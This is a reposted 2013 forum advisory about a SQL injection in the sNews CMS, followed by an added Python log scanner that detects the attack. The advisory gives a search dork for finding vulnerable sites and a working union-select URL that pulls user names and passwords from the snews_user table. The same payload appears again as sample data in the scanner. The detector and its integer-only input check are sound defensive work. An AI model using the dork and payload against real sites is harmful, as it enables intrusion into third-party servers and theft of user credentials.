China Network Penetration Testing Alliance
Title: CMS snews SQL Injection and Fix
Author: admin
Time: 2013-1-23 08:55
Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"
*************************************************************
SQL poc:
http://www.2cto.com
/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*
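
An added example (not part of the original advisory or of the sNews code): a log check for the `id` parameter of `act=shownews` named in the PoC above. It collapses `/**/` comments, which the example request uses in place of spaces, before applying a whitespace-based signature; the log lines are constructed and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client IPs are documentation addresses.
# The second request is the example URL from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jan/2013:08:55:01 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [23/Jan/2013:08:56:12 +0000] "GET /snews/snews.php?act=shownews'
    '&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6'
    '/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 4870',
    '192.0.2.10 - - [23/Jan/2013:08:57:30 +0000] "GET /snews/snews.php?act=shownews&id=7%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [23/Jan/2013:08:58:02 +0000] "GET /snews/index.php?id=abc HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Whitespace-based signature: it only matches once inline comments are collapsed.
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b|\bselect\b.+\bfrom\b", re.I | re.S)

def classify_id(raw):
    """Return 'ok', 'non-numeric' or 'sqli' for a URL-decoded id value."""
    if re.fullmatch(r"\d{1,10}", raw):
        return "ok"  # an article id is expected to be a plain positive integer
    # Replace /*...*/ comments and a trailing unterminated /* with a space.
    flat = re.sub(r"/\*.*?\*/|/\*.*$", " ", raw, flags=re.S)
    return "sqli" if SQLI_RE.search(flat) else "non-numeric"

def scan(lines):
    """Return (client_ip, verdict, decoded_id) for suspicious shownews requests."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
            continue
        for raw in params.get("id", [""]):
            verdict = classify_id(raw)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, raw))
    return findings

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule used in `classify_id` is the input check the application side needs for `id` before the value reaches a query.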
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)